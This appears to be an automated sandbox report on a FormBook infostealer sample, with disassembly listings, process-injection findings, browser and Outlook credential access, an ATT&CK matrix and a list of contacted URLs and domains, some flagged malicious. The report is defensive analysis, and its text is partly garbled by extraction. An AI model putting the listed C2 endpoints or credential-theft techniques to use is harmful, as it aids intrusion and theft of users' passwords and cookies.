        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550C0F6 mov eax, dword ptr fs:[00000030h]4_2_3550C0F6
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355090F8 mov eax, dword ptr fs:[00000030h]4_2_355090F8
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355090F8 mov eax, dword ptr fs:[00000030h]4_2_355090F8
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355090F8 mov eax, dword ptr fs:[00000030h]4_2_355090F8
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355090F8 mov eax, dword ptr fs:[00000030h]4_2_355090F8
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550C090 mov eax, dword ptr fs:[00000030h]4_2_3550C090
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550A093 mov ecx, dword ptr fs:[00000030h]4_2_3550A093
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E4080 mov eax, dword ptr fs:[00000030h]4_2_355E4080
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E4080 mov eax, dword ptr fs:[00000030h]4_2_355E4080
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E4080 mov eax, dword ptr fs:[00000030h]4_2_355E4080
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E4080 mov eax, dword ptr fs:[00000030h]4_2_355E4080
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E4080 mov eax, dword ptr fs:[00000030h]4_2_355E4080
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E4080 mov eax, dword ptr fs:[00000030h]4_2_355E4080
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E4080 mov eax, dword ptr fs:[00000030h]4_2_355E4080
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E50B7 mov eax, dword ptr fs:[00000030h]4_2_355E50B7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355500A5 mov eax, dword ptr fs:[00000030h]4_2_355500A5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CB0AF mov eax, dword ptr fs:[00000030h]4_2_355CB0AF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355BF0A5 mov eax, dword ptr fs:[00000030h]4_2_355BF0A5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355BF0A5 mov eax, dword ptr fs:[00000030h]4_2_355BF0A5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355BF0A5 mov eax, dword ptr fs:[00000030h]4_2_355BF0A5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355BF0A5 mov eax, dword ptr fs:[00000030h]4_2_355BF0A5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355BF0A5 mov eax, dword ptr fs:[00000030h]4_2_355BF0A5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355BF0A5 mov eax, dword ptr fs:[00000030h]4_2_355BF0A5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355BF0A5 mov eax, dword ptr fs:[00000030h]4_2_355BF0A5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A350 mov eax, dword ptr fs:[00000030h]4_2_3554A350
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35508347 mov eax, dword ptr fs:[00000030h]4_2_35508347
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35508347 mov eax, dword ptr fs:[00000030h]4_2_35508347
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35508347 mov eax, dword ptr fs:[00000030h]4_2_35508347
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35590371 mov eax, dword ptr fs:[00000030h]4_2_35590371
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35590371 mov eax, dword ptr fs:[00000030h]4_2_35590371
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553237A mov eax, dword ptr fs:[00000030h]4_2_3553237A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E372 mov eax, dword ptr fs:[00000030h]4_2_3558E372
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E372 mov eax, dword ptr fs:[00000030h]4_2_3558E372
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E372 mov eax, dword ptr fs:[00000030h]4_2_3558E372
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E372 mov eax, dword ptr fs:[00000030h]4_2_3558E372
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E363 mov eax, dword ptr fs:[00000030h]4_2_3554E363
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E363 mov eax, dword ptr fs:[00000030h]4_2_3554E363
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E363 mov eax, dword ptr fs:[00000030h]4_2_3554E363
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E363 mov eax, dword ptr fs:[00000030h]4_2_3554E363
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E363 mov eax, dword ptr fs:[00000030h]4_2_3554E363
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E363 mov eax, dword ptr fs:[00000030h]4_2_3554E363
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E363 mov eax, dword ptr fs:[00000030h]4_2_3554E363
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E363 mov eax, dword ptr fs:[00000030h]4_2_3554E363
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552E310 mov eax, dword ptr fs:[00000030h]4_2_3552E310
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552E310 mov eax, dword ptr fs:[00000030h]4_2_3552E310
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552E310 mov eax, dword ptr fs:[00000030h]4_2_3552E310
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35529319 mov eax, dword ptr fs:[00000030h]4_2_35529319
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554631F mov eax, dword ptr fs:[00000030h]4_2_3554631F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E3336 mov eax, dword ptr fs:[00000030h]4_2_355E3336
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35548322 mov eax, dword ptr fs:[00000030h]4_2_35548322
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35548322 mov eax, dword ptr fs:[00000030h]4_2_35548322
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35548322 mov eax, dword ptr fs:[00000030h]4_2_35548322
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550E328 mov eax, dword ptr fs:[00000030h]4_2_3550E328
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550E328 mov eax, dword ptr fs:[00000030h]4_2_3550E328
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550E328 mov eax, dword ptr fs:[00000030h]4_2_3550E328
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553332D mov eax, dword ptr fs:[00000030h]4_2_3553332D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355433D0 mov eax, dword ptr fs:[00000030h]4_2_355433D0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355443D0 mov ecx, dword ptr fs:[00000030h]4_2_355443D0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355943D5 mov eax, dword ptr fs:[00000030h]4_2_355943D5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550E3C0 mov eax, dword ptr fs:[00000030h]4_2_3550E3C0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550E3C0 mov eax, dword ptr fs:[00000030h]4_2_3550E3C0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550E3C0 mov eax, dword ptr fs:[00000030h]4_2_3550E3C0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550C3C7 mov eax, dword ptr fs:[00000030h]4_2_3550C3C7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355163CB mov eax, dword ptr fs:[00000030h]4_2_355163CB
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553A390 mov eax, dword ptr fs:[00000030h]4_2_3553A390
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553A390 mov eax, dword ptr fs:[00000030h]4_2_3553A390
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553A390 mov eax, dword ptr fs:[00000030h]4_2_3553A390
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35511380 mov eax, dword ptr fs:[00000030h]4_2_35511380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35511380 mov eax, dword ptr fs:[00000030h]4_2_35511380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35511380 mov eax, dword ptr fs:[00000030h]4_2_35511380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35511380 mov eax, dword ptr fs:[00000030h]4_2_35511380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35511380 mov eax, dword ptr fs:[00000030h]4_2_35511380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F380 mov eax, dword ptr fs:[00000030h]4_2_3552F380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F380 mov eax, dword ptr fs:[00000030h]4_2_3552F380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F380 mov eax, dword ptr fs:[00000030h]4_2_3552F380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F380 mov eax, dword ptr fs:[00000030h]4_2_3552F380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F380 mov eax, dword ptr fs:[00000030h]4_2_3552F380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F380 mov eax, dword ptr fs:[00000030h]4_2_3552F380
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF38A mov eax, dword ptr fs:[00000030h]4_2_355CF38A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558C3B0 mov eax, dword ptr fs:[00000030h]4_2_3558C3B0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355193A6 mov eax, dword ptr fs:[00000030h]4_2_355193A6
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355193A6 mov eax, dword ptr fs:[00000030h]4_2_355193A6
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553F24A mov eax, dword ptr fs:[00000030h]4_2_3553F24A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF247 mov eax, dword ptr fs:[00000030h]4_2_355CF247
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B273 mov eax, dword ptr fs:[00000030h]4_2_3550B273
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B273 mov eax, dword ptr fs:[00000030h]4_2_3550B273
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B273 mov eax, dword ptr fs:[00000030h]4_2_3550B273
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CD270 mov eax, dword ptr fs:[00000030h]4_2_355CD270
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550821B mov eax, dword ptr fs:[00000030h]4_2_3550821B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559B214 mov eax, dword ptr fs:[00000030h]4_2_3559B214
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559B214 mov eax, dword ptr fs:[00000030h]4_2_3559B214
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550A200 mov eax, dword ptr fs:[00000030h]4_2_3550A200
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35530230 mov ecx, dword ptr fs:[00000030h]4_2_35530230
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35590227 mov eax, dword ptr fs:[00000030h]4_2_35590227
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35590227 mov eax, dword ptr fs:[00000030h]4_2_35590227
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35590227 mov eax, dword ptr fs:[00000030h]4_2_35590227
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A22B mov eax, dword ptr fs:[00000030h]4_2_3554A22B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A22B mov eax, dword ptr fs:[00000030h]4_2_3554A22B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A22B mov eax, dword ptr fs:[00000030h]4_2_3554A22B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355332C5 mov eax, dword ptr fs:[00000030h]4_2_355332C5
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E32C9 mov eax, dword ptr fs:[00000030h]4_2_355E32C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355202F9 mov eax, dword ptr fs:[00000030h]4_2_355202F9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355202F9 mov eax, dword ptr fs:[00000030h]4_2_355202F9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355202F9 mov eax, dword ptr fs:[00000030h]4_2_355202F9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355202F9 mov eax, dword ptr fs:[00000030h]4_2_355202F9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355202F9 mov eax, dword ptr fs:[00000030h]4_2_355202F9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355202F9 mov eax, dword ptr fs:[00000030h]4_2_355202F9

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Injects a PE file into a foreign processes
        Source: C:\Windows\SysWOW64\netiougc.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF77A870000 value starts with: 4D5AJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: NULL target: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeSection loaded: NULL target: C:\Windows\SysWOW64\netiougc.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: NULL target: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: NULL target: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\netiougc.exeThread APC queued: target process: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\netiougc.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF77A870000Jump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeProcess created: C:\Users\user\Desktop\Grundforbedre39.exe C:\Users\user\Desktop\Grundforbedre39.exeJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeProcess created: C:\Windows\SysWOW64\netiougc.exe C:\Windows\SysWOW64\netiougc.exeJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_0040326A EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040326A

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\netiougc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Masquerading        		1
        OS Credential Dumping        		21
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts411
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		1
        Access Token Manipulation        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin Shares1
        Data from Local System        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets2
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
        Obfuscated Files or Information        		Cached Domain Credentials4
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1410990 Sample: Grundforbedre39.exe Startdate: 18/03/2024 Architecture: WINDOWS Score: 100 29 www.wbyzm5.buzz 2->29 31 www.tyc8099a.com 2->31 33 24 other IPs or domains 2->33 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 4 other signatures 2->51 10 Grundforbedre39.exe 7 55 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\Local\...\System.dll, PE32 10->27 dropped 13 Grundforbedre39.exe 6 10->13         started        process6 dnsIp7 41 drive.usercontent.google.com 142.250.65.161, 443, 49758 GOOGLEUS United States 13->41 43 drive.google.com 142.251.41.14, 443, 49757 GOOGLEUS United States 13->43 61 Maps a DLL or memory area into another process 13->61 17 aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe 13->17 injected signatures8 process9 process10 19 netiougc.exe 13 17->19         started        signatures11 53 Tries to steal Mail credentials (via file / registry access) 19->53 55 Tries to harvest and steal browser information (history, passwords, etc) 19->55 57 Writes to foreign memory regions 19->57 59 3 other signatures 19->59 22 aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe 19->22 injected 25 firefox.exe 19->25         started        process12 dnsIp13 35 guiguigohost.com 195.110.124.133, 49829, 49830, 49831 REGISTER-ASIT Italy 22->35 37 www.manupaint.com 46.30.215.63, 49787, 49788, 49789 ONECOMDK Denmark 22->37 39 8 other IPs or domains 22->39

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Grundforbedre39.exe100%AviraHEUR/AGEN.1361137
        Grundforbedre39.exe24%ReversingLabsWin32.Trojan.InjectorX

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.manupaint.com/m9so/0%Avira URL Cloudsafe
        http://www.wbyzm5.buzz/m9so/?LFPxWlV=m/+4sInKRUCBr4G0qRueLBh/JRgfrGd1CLcm3iGGUHJib9fBZO/vQs/EedckMLPR1G/2qi8YD1/iBxsP0/EJoTSgX51ucE1l7Q2MujCVII/KP9Y5kFBINaU=&OBLTJ=U4yhXH6x-jhX0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.alpinebretech.life/m9so/0%Avira URL Cloudsafe
        http://www.manupaint.com/m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP+bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k+cOpuPGr7qZ2xBz7I=&OBLTJ=U4yhXH6x-jhX0%Avira URL Cloudsafe
        http://www.wbyzm5.buzz/m9so/0%Avira URL Cloudsafe
        http://www.teenpattimasterapp.org/m9so/0%Avira URL Cloudsafe
        http://www.noonartists.com/m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhX0%Avira URL Cloudsafe
        http://www.plainpathproductions.com/m9so/?LFPxWlV=c3dPWH5xU9RuE2iPYX/YJd5aP2cwjKm8nfGtIgIly07Hn5MDdL5huHRSG1wDYayNCeUJMK+qa7csQOwAA/itbsq5+k4WWz6YXZNbnqhrlmQsoR/1yVl4O5E=&OBLTJ=U4yhXH6x-jhX0%Avira URL Cloudsafe
        http://www.feshi.store/m9so/0%Avira URL Cloudsafe
        http://www.meliorras.com/m9so/?LFPxWlV=hV0gUtH6eivuG6a1gtKJKPXk2w7TZurpdSJvAkXahnCKr3ZNP6l/DgROigVMeqNmcpawXvZwG91uaBFQ9vCDEXt4463W6r+4wKZPe4czMIeO7JeDEKZ34NE=&OBLTJ=U4yhXH6x-jhX0%Avira URL Cloudsafe
        http://www.feshi.store/m9so/?LFPxWlV=1Qsa/7J+srdsR8Dz/ES5S27r13qOWkq23euP4yB+JqRfE/nsbLJ5FW7PdqHJizPjrTq31E4BOQDA72YgssNaoReb8a5kH4cRUYabd93Dw2rUjSskRvR+x9I=&OBLTJ=U4yhXH6x-jhX0%Avira URL Cloudsafe
        http://www.cyberpsychsecurity.com/m9so/0%Avira URL Cloudsafe
        http://www.cyberpsychsecurity.com/m9so/?LFPxWlV=jovxqEZjMvfd7zz2mTvvE1OonaQx4w6Z/02MEDusjhfET0PBGFNNsERdDgiHq90zA+FiNHbHunAjmlnnTBHWzyxLPlfgZ5XyFdT5RHsnhVfKl1JVA017Cgw=&OBLTJ=U4yhXH6x-jhX0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.plainpathproductions.com/m9so/0%Avira URL Cloudsafe
        http://www.guiguigohost.com/m9so/100%Avira URL Cloudmalware
        http://www.quovadis.bm00%Avira URL Cloudsafe
        http://www.alpinebretech.life/m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhX0%Avira URL Cloudsafe
        http://www.meliorras.com/m9so/0%Avira URL Cloudsafe
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
